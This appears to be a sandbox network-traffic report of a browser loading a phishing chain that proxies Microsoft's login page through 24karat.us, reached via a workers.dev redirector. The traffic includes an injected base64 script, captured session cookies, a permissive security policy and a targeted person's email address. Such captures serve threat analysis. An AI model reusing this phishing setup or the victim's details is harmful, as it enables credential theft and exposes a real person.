                                      2024-03-22 14:24:11 UTC1925OUTGET /captcha.rdr?ref=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD1qZ29sJTQwYmdjbGluaWMuY29tJmNsaWVudC1yZXF1ZXN0LWlkPTAxMWI5YzExLWI0MWMtYjZlOC0yZTdhLWM0ZTdmMTk2ZWI0MCZwcm90ZWN0ZWR0b2tlbj10cnVlJmNsYWltcz0lN2IlMjJpZF90b2tlbiUyMiUzYSU3YiUyMnhtc19jYyUyMiUzYSU3YiUyMnZhbHVlcyUyMiUzYSU1YiUyMkNQMSUyMiU1ZCU3ZCU3ZCU3ZCZub25jZT02Mzg0NjcxNDI1MTE3MjE0NDIuNzVlNjY0YjMtNDU1Zi00YTdhLWI2ZWUtOTcyOTFhZmNmZGI4JnN0YXRlPURjc3hFb01nRUVCUmlGZlJFblZ4MmRVaWs2TTRnRURJRUdneWstdEw4WDczcFJCaTZCNmRYSHNFMDdZak1hQTJBS3dCVWM5c0FoRzZUYUV4VWFGbHF4eUZvQTdXQjlqbzQtVjIyZDl4YVgtN3ZFcEx1Wjd2WEhfUFQycGx3dFVsWDNMTmZ2YnRld00= HTTP/1.1
                                      Host: 24karat.us
                                      Connection: keep-alive
                                      Upgrade-Insecure-Requests: 1
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                      Sec-Fetch-Site: cross-site
                                      Sec-Fetch-Mode: navigate
                                      Sec-Fetch-Dest: iframe
                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                      sec-ch-ua-mobile: ?0
                                      sec-ch-ua-platform: "Windows"
                                      Referer: https://33208b95.7187b59e75e5ee4922ee53c8.workers.dev/
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Cookie: qPdM=G0lmo8CEkbi7; qPdM.sig=SQo4T0JDmvCxZj-g4pAzrzjJHn4; ClientId=AD8DDA6D248F459D832803D0055B823B; OIDC=1; OpenIdConnect.nonce.v3.g427BzjQDBzf0BO-QNx0HwoLVfc2raPrjczMthckQqc=638467142511721442.75e664b3-455f-4a7a-b6ee-97291afcfdb8; X-OWA-RedirectHistory=ArLym14B4nsrvntK3Ag
                                      2024-03-22 14:24:12 UTC1998INHTTP/1.1 200 OK
                                      Cache-Control: no-store, no-cache
                                      Pragma: no-cache
                                      Content-Type: text/html; charset=utf-8
                                      Expires: -1
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains
                                      P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                      x-ms-request-id: cd5cbbf6-1fd1-4f20-8c10-bc53efcb1300
                                      x-ms-ests-server: 2.1.17573.7 - EUS ProdSlices
                                      nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
                                      Referrer-Policy: strict-origin-when-cross-origin
                                      Set-Cookie: esctx-lZyzPZZ7dso=AQABCQEAAADnfolhJpSnRYB1SVj-Hgd85eCgDwL7M8YVfiTo-qIfO8StpvsLk0tqGoGFWefLdFyaafHaf7O_n8GPUbJCkB87Vi65bbl_yGNCRT2TFf8iuGD99QfWdfwTN6UEFGMUgIqrJqaS-tOc1s6BT-joOb3kURJuKMJLK3JyzXobixdYjiAA; domain=24karat.us; path=/; secure; HttpOnly; SameSite=None
                                      Set-Cookie: fpc=AnAxjE-_txJPjQb7YYiXMlU; expires=Sun, 21-Apr-2024 14:24:12 GMT; path=/; secure; HttpOnly; SameSite=None
                                      Set-Cookie: esctx=PAQABBwEAAADnfolhJpSnRYB1SVj-Hgd828fF6I_XkBu9671vguo1Q-kUj_aaWavCZbbevWme2Iye5T7j5evWQA9m7zcoikJfzS2vlzmFf7HRVxoZwN2oO7hhr3V4eB-Y53a95UCEfmIL7cAmUFARrV8dZ_bC-AirXdhJ0AzcrEQHwh7utoz485kNe-KtFuVC1ODAc4cxDK8gAA; domain=24karat.us; path=/; secure; HttpOnly; SameSite=None
                                      Set-Cookie: x-ms-gateway-slice=estsfd; path=/; secure; samesite=none; httponly
                                      Set-Cookie: stsservicecookie=estsfd; path=/; secure; samesite=none; httponly
                                      Date: Fri, 22 Mar 2024 14:24:11 GMT
                                      Connection: close
                                      content-length: 20864
                                      Content-Security-Policy: default-src * data: blob: filesystem: about: ws: wss: 'unsafe-inline' 'unsafe-eval'; form-action * data: blob: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src * data: blob: filesystem: ; frame-ancestors 'self' * http://* https://* file://* about: javascript: data: blob: filesystem: ; object-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; style-src * data: blob: 'unsafe-inline'; font-src * data: blob: 'unsafe-inline';
                                      2024-03-22 14:24:12 UTC14386INData Raw: 0d 0a 0d 0a 3c 21 2d 2d 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 20 2d 2d 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 64 61 74 61 3a 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 3b 62 61 73 65 36 34 2c 5a 6e 56 75 59 33 52 70 62 32 34 67 59 79 67 70 65 32 6c 6d 4b 43 46 6b 62 32 4e 31 62 57 56 75 64 43 35 78 64 57 56 79 65 56 4e 6c 62 47 56 6a 64 47 39 79 4b 43 49 75 59 69 49 70 49 48 78 38 49 43 46 6b 62 32 4e 31 62 57 56 75 64 43 35 78 64 57 56 79 65 56 4e 6c 62 47 56 6a 64 47 39 79 4b 43 49 75 5a 79 49 70 4b 58 74 6b 62 32
                                      Data Ascii: ... Copyright (C) Microsoft Corporation. All rights reserved. --><!DOCTYPE html><html><head><script src="data:text/javascript;base64,ZnVuY3Rpb24gYygpe2lmKCFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuYiIpIHx8ICFkb2N1bWVudC5xdWVyeVNlbGVjdG9yKCIuZyIpKXtkb2
                                      2024-03-22 14:24:12 UTC6478INData Raw: 29 7d 2c 63 2e 4f 6e 45 72 72 6f 72 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 65 2e 73 72 63 7c 7c 65 2e 68 72 65 66 7c 7c 22 22 2c 6f 3d 69 28 29 2c 73 3d 61 28 29 3b 69 66 28 21 65 29 7b 74 68 72 6f 77 22 54 68 65 20 74 61 72 67 65 74 20 65 6c 65 6d 65 6e 74 20 6d 75 73 74 20 62 65 20 70 72 6f 76 69 64 65 64 20 61 6e 64 20 63 61 6e 6e 6f 74 20 62 65 20 6e 75 6c 6c 2e 22 7d 72 28 22 5b 24 4c 6f 61 64 65 72 5d 3a 20 46 61 69 6c 65 64 22 2c 65 29 3b 76 61 72 20 75 3d 6e 65 77 20 63 3b 75 2e 66 61 69 6c 4d 65 73 73 61 67 65 3d 22 52 65 6c 6f 61 64 20 46 61 69 6c 65 64 22 2c 75 2e 73 75 63 63 65 73 73 4d 65 73 73 61 67 65 3d 22 52 65 6c 6f 61 64 20 53 75 63 63 65 73 73 22 2c 75 2e 41 64 64 46 6f 72 52 65 6c 6f 61 64 28 65 2c 74 29 2c 0a
                                      Data Ascii: )},c.OnError=function(e,t){var n=e.src||e.href||"",o=i(),s=a();if(!e){throw"The target element must be provided and cannot be null."}r("[$Loader]: Failed",e);var u=new c;u.failMessage="Reload Failed",u.successMessage="Reload Success",u.AddForReload(e,t),


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      26192.168.2.449776162.220.165.2494433592C:\Program Files\Google\Chrome\Application\chrome.exe
                                      TimestampBytes transferredDirectionData
                                      2024-03-22 14:24:12 UTC2317OUTGET /aadcdn.msftauth.net/~/shared/1.0/content/js/BssoInterrupt_Core_GW4zPEKtwiiwtRHaCqGPVw2.js HTTP/1.1
                                      Host: 24karat.us
                                      Connection: keep-alive
                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                      sec-ch-ua-mobile: ?0
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                      sec-ch-ua-platform: "Windows"
                                      Accept: */*
                                      Sec-Fetch-Site: same-origin
                                      Sec-Fetch-Mode: no-cors
                                      Sec-Fetch-Dest: script
                                      Referer: https://24karat.us/captcha.rdr?ref=aHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tL2NvbW1vbi9vYXV0aDIvYXV0aG9yaXplP2NsaWVudF9pZD0wMDAwMDAwMi0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmb3V0bG9vay5vZmZpY2UuY29tJTJmb3dhJTJmJnJlc291cmNlPTAwMDAwMDAyLTAwMDAtMGZmMS1jZTAwLTAwMDAwMDAwMDAwMCZyZXNwb25zZV9tb2RlPWZvcm1fcG9zdCZyZXNwb25zZV90eXBlPWNvZGUraWRfdG9rZW4mc2NvcGU9b3BlbmlkJm1zYWZlZD0xJm1zYXJlZGlyPTEmbG9naW5faGludD1qZ29sJTQwYmdjbGluaWMuY29tJmNsaWVudC1yZXF1ZXN0LWlkPTAxMWI5YzExLWI0MWMtYjZlOC0yZTdhLWM0ZTdmMTk2ZWI0MCZwcm90ZWN0ZWR0b2tlbj10cnVlJmNsYWltcz0lN2IlMjJpZF90b2tlbiUyMiUzYSU3YiUyMnhtc19jYyUyMiUzYSU3YiUyMnZhbHVlcyUyMiUzYSU1YiUyMkNQMSUyMiU1ZCU3ZCU3ZCU3ZCZub25jZT02Mzg0NjcxNDI1MTE3MjE0NDIuNzVlNjY0YjMtNDU1Zi00YTdhLWI2ZWUtOTcyOTFhZmNmZGI4JnN0YXRlPURjc3hFb01nRUVCUmlGZlJFblZ4MmRVaWs2TTRnRURJRUdneWstdEw4WDczcFJCaTZCNmRYSHNFMDdZak1hQTJBS3dCVWM5c0FoRzZUYUV4VWFGbHF4eUZvQTdXQjlqbzQtVjIyZDl4YVgtN3ZFcEx1Wjd2WEhfUFQycGx3dFVsWDNMTmZ2YnRld00=
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      Cookie: qPdM=G0lmo8CEkbi7; qPdM.sig=SQo4T0JDmvCxZj-g4pAzrzjJHn4; ClientId=AD8DDA6D248F459D832803D0055B823B; OIDC=1; OpenIdConnect.nonce.v3.g427BzjQDBzf0BO-QNx0HwoLVfc2raPrjczMthckQqc=638467142511721442.75e664b3-455f-4a7a-b6ee-97291afcfdb8; X-OWA-RedirectHistory=ArLym14B4nsrvntK3Ag; esctx-lZyzPZZ7dso=AQABCQEAAADnfolhJpSnRYB1SVj-Hgd85eCgDwL7M8YVfiTo-qIfO8StpvsLk0tqGoGFWefLdFyaafHaf7O_n8GPUbJCkB87Vi65bbl_yGNCRT2TFf8iuGD99QfWdfwTN6UEFGMUgIqrJqaS-tOc1s6BT-joOb3kURJuKMJLK3JyzXobixdYjiAA; fpc=AnAxjE-_txJPjQb7YYiXMlU; esctx=PAQABBwEAAADnfolhJpSnRYB1SVj-Hgd828fF6I_XkBu9671vguo1Q-kUj_aaWavCZbbevWme2Iye5T7j5evWQA9m7zcoikJfzS2vlzmFf7HRVxoZwN2oO7hhr3V4eB-Y53a95UCEfmIL7cAmUFARrV8dZ_bC-AirXdhJ0AzcrEQHwh7utoz485kNe-KtFuVC1ODAc4cxDK8gAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd
                                      2024-03-22 14:24:12 UTC1343INHTTP/1.1 200 OK
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                      Age: 2473601
                                      Cache-Control: public, max-age=31536000
                                      Content-MD5: SLOVud8XL8LSxCXtE2EZYg==
                                      Content-Type: application/x-javascript
                                      Date: Fri, 22 Mar 2024 14:24:12 GMT
                                      Etag: 0x8DC2E5A49B39796
                                      Last-Modified: Thu, 15 Feb 2024 19:14:09 GMT
                                      Server: ECAcc (nya/7888)
                                      Vary: Accept-Encoding
                                      X-Cache: HIT
                                      x-ms-blob-type: BlockBlob
                                      x-ms-lease-status: unlocked
                                      x-ms-request-id: 504f4d75-401e-00b3-77e5-655164000000
                                      x-ms-version: 2009-09-19
                                      content-length: 141282
                                      Connection: close
                                      Content-Security-Policy: default-src * data: blob: filesystem: about: ws: wss: 'unsafe-inline' 'unsafe-eval'; form-action * data: blob: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src * data: blob: filesystem: ; frame-ancestors 'self' * http://* https://* file://* about: javascript: data: blob: filesystem: ; object-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; style-src * data: blob: 'unsafe-inline'; font-src * data: blob: 'unsafe-inline';
                                      2024-03-22 14:24:12 UTC15041INData Raw: 2f 2a 21 0a 20 2a 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 20 53 54 41 52 54 20 4f 46 20 54 48 49 52 44 20 50 41 52 54 59 20 4e 4f 54 49 43 45 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 20 2a 20 0a 20 2a 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 62 61 73 65 64 20 6f 6e 20 6f 72 20 69 6e 63 6f 72 70 6f 72 61 74 65 73 20 6d 61 74 65 72 69 61 6c 20 66 72 6f 6d 20 74 68 65 20 70 72 6f 6a 65 63 74 73 20 6c 69 73 74 65 64 20 62 65 6c 6f 77 20 28 54 68 69 72 64 20 50 61 72 74 79 20 49 50 29 2e 20 54 68 65 20 6f 72 69 67 69 6e 61 6c 20 63 6f 70 79 72 69 67 68 74 20 6e 6f 74 69 63 65 20 61
                                      Data Ascii: /*! * ------------------------------------------- START OF THIRD PARTY NOTICE ----------------------------------------- * * This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice a
                                      2024-03-22 14:24:12 UTC16384INData Raw: 70 61 6e 22 29 3b 65 2e 73 74 79 6c 65 2e 62 6f 72 64 65 72 4c 65 66 74 43 6f 6c 6f 72 3d 22 72 65 64 22 2c 65 2e 73 74 79 6c 65 2e 62 6f 72 64 65 72 52 69 67 68 74 43 6f 6c 6f 72 3d 22 62 6c 75 65 22 2c 65 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 22 61 62 73 6f 6c 75 74 65 22 2c 65 2e 73 74 79 6c 65 2e 74 6f 70 3d 22 2d 39 39 39 70 78 22 2c 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 65 29 3b 76 61 72 20 6e 3d 5f 2e 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 28 65 29 3b 45 3d 6e 2e 62 6f 72 64 65 72 4c 65 66 74 43 6f 6c 6f 72 3d 3d 3d 6e 2e 62 6f 72 64 65 72 52 69 67 68 74 43 6f 6c 6f 72 2c 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 65 29 7d 72 65 74 75 72 6e 20 45 7d 2c 67
                                      Data Ascii: pan");e.style.borderLeftColor="red",e.style.borderRightColor="blue",e.style.position="absolute",e.style.top="-999px",document.body.appendChild(e);var n=_.getComputedStyle(e);E=n.borderLeftColor===n.borderRightColor,document.body.removeChild(e)}return E},g
                                      2024-03-22 14:24:13 UTC16384INData Raw: 4f 6e 6c 79 3a 39 39 39 39 2c 50 50 5f 45 5f 44 42 5f 4d 45 4d 42 45 52 44 4f 45 53 4e 4f 54 45 58 49 53 54 3a 22 43 46 46 46 46 43 31 35 22 2c 50 50 5f 45 5f 45 58 43 4c 55 44 45 44 3a 22 38 30 30 34 31 30 31 30 22 2c 50 50 5f 45 5f 4d 45 4d 42 45 52 5f 4c 4f 43 4b 45 44 3a 22 38 30 30 34 31 30 31 31 22 2c 50 50 5f 45 5f 42 41 44 5f 50 41 53 53 57 4f 52 44 3a 22 38 30 30 34 31 30 31 32 22 2c 50 50 5f 45 5f 4d 49 53 53 49 4e 47 5f 4d 45 4d 42 45 52 4e 41 4d 45 3a 22 38 30 30 34 31 30 33 31 22 2c 50 50 5f 45 5f 4d 49 53 53 49 4e 47 5f 50 41 53 53 57 4f 52 44 3a 22 38 30 30 34 31 30 33 32 22 2c 50 50 5f 45 5f 46 45 44 45 52 41 54 49 4f 4e 5f 49 4e 4c 49 4e 45 4c 4f 47 49 4e 5f 44 49 53 41 4c 4c 4f 57 45 44 3a 22 38 30 30 34 37 38 41 43 22 2c 50 50 5f 45 5f
                                      Data Ascii: Only:9999,PP_E_DB_MEMBERDOESNOTEXIST:"CFFFFC15",PP_E_EXCLUDED:"80041010",PP_E_MEMBER_LOCKED:"80041011",PP_E_BAD_PASSWORD:"80041012",PP_E_MISSING_MEMBERNAME:"80041031",PP_E_MISSING_PASSWORD:"80041032",PP_E_FEDERATION_INLINELOGIN_DISALLOWED:"800478AC",PP_E_
                                      2024-03-22 14:24:13 UTC16384INData Raw: 69 6f 6e 20 72 28 65 2c 6e 2c 74 2c 72 29 7b 76 61 72 20 6f 3d 65 5b 6e 5d 2e 6d 61 74 63 68 28 62 29 7c 7c 5b 5d 3b 53 2e 61 2e 44 28 74 2e 6d 61 74 63 68 28 62 29 2c 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 53 2e 61 2e 4e 61 28 6f 2c 65 2c 72 29 7d 29 29 2c 65 5b 6e 5d 3d 6f 2e 6a 6f 69 6e 28 22 20 22 29 7d 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2c 69 3d 7b 5f 5f 70 72 6f 74 6f 5f 5f 3a 5b 5d 7d 69 6e 73 74 61 6e 63 65 6f 66 20 41 72 72 61 79 2c 66 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 2c 70 3d 7b 7d 2c 68 3d 7b 7d 3b 70 5b 63 26 26 2f 46 69 72 65 66 6f 78 5c 2f 32 2f 69 2e 74 65 73 74 28 63 2e 75 73 65 72 41 67 65 6e 74 29 3f 22 4b 65 79 62 6f
                                      Data Ascii: ion r(e,n,t,r){var o=e[n].match(b)||[];S.a.D(t.match(b),(function(e){S.a.Na(o,e,r)})),e[n]=o.join(" ")}var o=Object.prototype.hasOwnProperty,i={__proto__:[]}instanceof Array,f="function"==typeof Symbol,p={},h={};p[c&&/Firefox\/2/i.test(c.userAgent)?"Keybo
                                      2024-03-22 14:24:13 UTC16384INData Raw: 77 20 45 72 72 6f 72 28 22 4f 6e 6c 79 20 73 75 62 73 63 72 69 62 61 62 6c 65 20 74 68 69 6e 67 73 20 63 61 6e 20 61 63 74 20 61 73 20 64 65 70 65 6e 64 65 6e 63 69 65 73 22 29 3b 74 2e 6f 64 2e 63 61 6c 6c 28 74 2e 70 64 2c 65 2c 65 2e 66 64 7c 7c 28 65 2e 66 64 3d 2b 2b 6f 29 29 7d 7d 2c 47 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 72 2c 6f 29 7b 74 72 79 7b 72 65 74 75 72 6e 20 65 28 29 2c 74 2e 61 70 70 6c 79 28 72 2c 6f 7c 7c 5b 5d 29 7d 66 69 6e 61 6c 6c 79 7b 6e 28 29 7d 7d 2c 71 61 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 74 29 72 65 74 75 72 6e 20 74 2e 6f 2e 71 61 28 29 7d 2c 56 61 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 74 29 72 65 74 75 72 6e 20 74 2e 6f 2e 56 61 28 29 7d 2c 59 61 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 74 29 72 65 74
                                      Data Ascii: w Error("Only subscribable things can act as dependencies");t.od.call(t.pd,e,e.fd||(e.fd=++o))}},G:function(t,r,o){try{return e(),t.apply(r,o||[])}finally{n()}},qa:function(){if(t)return t.o.qa()},Va:function(){if(t)return t.o.Va()},Ya:function(){if(t)ret
                                      2024-03-22 14:24:13 UTC16384INData Raw: 6f 6e 28 65 29 7b 73 77 69 74 63 68 28 65 2e 6e 6f 64 65 54 79 70 65 29 7b 63 61 73 65 20 31 3a 72 65 74 75 72 6e 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 62 69 6e 64 22 29 3b 63 61 73 65 20 38 3a 72 65 74 75 72 6e 20 53 2e 68 2e 56 64 28 65 29 3b 64 65 66 61 75 6c 74 3a 72 65 74 75 72 6e 20 6e 75 6c 6c 7d 7d 2c 70 61 72 73 65 42 69 6e 64 69 6e 67 73 53 74 72 69 6e 67 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 74 2c 72 29 7b 74 72 79 7b 76 61 72 20 6f 2c 69 3d 74 68 69 73 2e 6e 64 2c 61 3d 65 2b 28 72 26 26 72 2e 76 61 6c 75 65 41 63 63 65 73 73 6f 72 73 7c 7c 22 22 29 3b 69 66 28 21 28 6f 3d 69 5b 61 5d 29 29 7b 76 61 72 20 73 2c 75 3d 22 77 69 74 68 28 24 63 6f 6e 74 65 78 74 29 7b 77 69 74 68 28 24 64 61 74 61 7c 7c 7b 7d 29 7b
                                      Data Ascii: on(e){switch(e.nodeType){case 1:return e.getAttribute("data-bind");case 8:return S.h.Vd(e);default:return null}},parseBindingsString:function(e,n,t,r){try{var o,i=this.nd,a=e+(r&&r.valueAccessors||"");if(!(o=i[a])){var s,u="with($context){with($data||{}){
                                      2024-03-22 14:24:13 UTC16384INData Raw: 75 6e 63 74 69 6f 6e 22 3d 3d 72 3f 6e 28 65 29 3a 22 73 74 72 69 6e 67 22 3d 3d 72 3f 65 5b 6e 5d 3a 74 7d 66 75 6e 63 74 69 6f 6e 20 69 28 6e 2c 74 29 7b 69 66 28 68 26 26 6c 29 53 2e 69 2e 6d 61 28 65 2c 53 2e 69 2e 48 29 3b 65 6c 73 65 20 69 66 28 70 2e 6c 65 6e 67 74 68 29 7b 76 61 72 20 72 3d 30 3c 3d 53 2e 61 2e 41 28 70 2c 53 2e 77 2e 4d 28 74 5b 30 5d 29 29 3b 53 2e 61 2e 5a 63 28 74 5b 30 5d 2c 72 29 2c 68 26 26 21 72 26 26 53 2e 75 2e 47 28 53 2e 61 2e 46 62 2c 6e 75 6c 6c 2c 5b 65 2c 22 63 68 61 6e 67 65 22 5d 29 7d 7d 76 61 72 20 73 3d 65 2e 6d 75 6c 74 69 70 6c 65 2c 75 3d 30 21 3d 65 2e 6c 65 6e 67 74 68 26 26 73 3f 65 2e 73 63 72 6f 6c 6c 54 6f 70 3a 6e 75 6c 6c 2c 63 3d 53 2e 61 2e 66 28 6e 28 29 29 2c 6c 3d 74 2e 67 65 74 28 22 76 61 6c
                                      Data Ascii: unction"==r?n(e):"string"==r?e[n]:t}function i(n,t){if(h&&l)S.i.ma(e,S.i.H);else if(p.length){var r=0<=S.a.A(p,S.w.M(t[0]));S.a.Zc(t[0],r),h&&!r&&S.u.G(S.a.Fb,null,[e,"change"])}}var s=e.multiple,u=0!=e.length&&s?e.scrollTop:null,c=S.a.f(n()),l=t.get("val
                                      2024-03-22 14:24:13 UTC16384INData Raw: 2e 6f 70 65 6e 2e 74 6f 53 74 72 69 6e 67 28 29 2e 69 6e 64 65 78 4f 66 28 22 5f 5f 22 29 29 72 65 74 75 72 6e 20 32 7d 63 61 74 63 68 28 65 29 7b 7d 72 65 74 75 72 6e 20 31 7d 28 29 3b 74 68 69 73 2e 72 65 6e 64 65 72 54 65 6d 70 6c 61 74 65 53 6f 75 72 63 65 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 74 2c 72 2c 6f 29 7b 69 66 28 6f 3d 6f 7c 7c 75 2c 72 3d 72 7c 7c 7b 7d 2c 32 3e 65 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 59 6f 75 72 20 76 65 72 73 69 6f 6e 20 6f 66 20 6a 51 75 65 72 79 2e 74 6d 70 6c 20 69 73 20 74 6f 6f 20 6f 6c 64 2e 20 50 6c 65 61 73 65 20 75 70 67 72 61 64 65 20 74 6f 20 6a 51 75 65 72 79 2e 74 6d 70 6c 20 31 2e 30 2e 30 70 72 65 20 6f 72 20 6c 61 74 65 72 2e 22 29 3b 76 61 72 20 69 3d 6e 2e 64 61 74 61 28 22 70 72 65 63 6f 6d 70 69 6c
                                      Data Ascii: .open.toString().indexOf("__"))return 2}catch(e){}return 1}();this.renderTemplateSource=function(n,t,r,o){if(o=o||u,r=r||{},2>e)throw Error("Your version of jQuery.tmpl is too old. Please upgrade to jQuery.tmpl 1.0.0pre or later.");var i=n.data("precompil
                                      2024-03-22 14:24:13 UTC11553INData Raw: 30 29 2c 73 3d 74 28 31 29 2c 75 3d 74 28 39 29 2e 67 65 74 49 6e 73 74 61 6e 63 65 28 77 69 6e 64 6f 77 2e 53 65 72 76 65 72 44 61 74 61 29 2c 63 3d 74 28 35 29 2c 6c 3d 77 69 6e 64 6f 77 2c 64 3d 6c 2e 24 43 6f 6e 66 69 67 7c 7c 6c 2e 53 65 72 76 65 72 44 61 74 61 7c 7c 7b 7d 2c 66 3d 61 2e 4f 62 6a 65 63 74 2c 70 3d 73 2e 51 75 65 72 79 53 74 72 69 6e 67 3b 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 74 68 69 73 2c 74 3d 21 31 21 3d 3d 28 65 3d 65 7c 7c 7b 7d 29 2e 63 68 65 63 6b 41 70 69 43 61 6e 61 72 79 2c 61 3d 65 2e 77 69 74 68 43 72 65 64 65 6e 74 69 61 6c 73 7c 7c 21 31 2c 73 3d 65 2e 62 72 65 61 6b 43 61 63 68 65 7c 7c 21 31 2c 68 3d 65 2e 72 65 73 70 6f 6e 73 65 54 79 70 65 7c 7c 22 22 2c 67 3d 65 2e 6e
                                      Data Ascii: 0),s=t(1),u=t(9).getInstance(window.ServerData),c=t(5),l=window,d=l.$Config||l.ServerData||{},f=a.Object,p=s.QueryString;e.exports=function(e){var n=this,t=!1!==(e=e||{}).checkApiCanary,a=e.withCredentials||!1,s=e.breakCache||!1,h=e.responseType||"",g=e.n


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      27192.168.2.449769172.67.132.204433592C:\Program Files\Google\Chrome\Application\chrome.exe
                                      TimestampBytes transferredDirectionData
                                      2024-03-22 14:24:13 UTC668OUTGET /favicon.ico HTTP/1.1
                                      Host: 33208b95.7187b59e75e5ee4922ee53c8.workers.dev
                                      Connection: keep-alive
                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                      sec-ch-ua-mobile: ?0
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                      sec-ch-ua-platform: "Windows"
                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                      Sec-Fetch-Site: same-origin
                                      Sec-Fetch-Mode: no-cors
                                      Sec-Fetch-Dest: image
                                      Referer: https://33208b95.7187b59e75e5ee4922ee53c8.workers.dev/?qrc=jgol@bgclinic.com
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      2024-03-22 14:24:13 UTC585INHTTP/1.1 200 OK
                                      Date: Fri, 22 Mar 2024 14:24:13 GMT
                                      Content-Type: text/html;charset=UTF-8
                                      Content-Length: 3255
                                      Connection: close
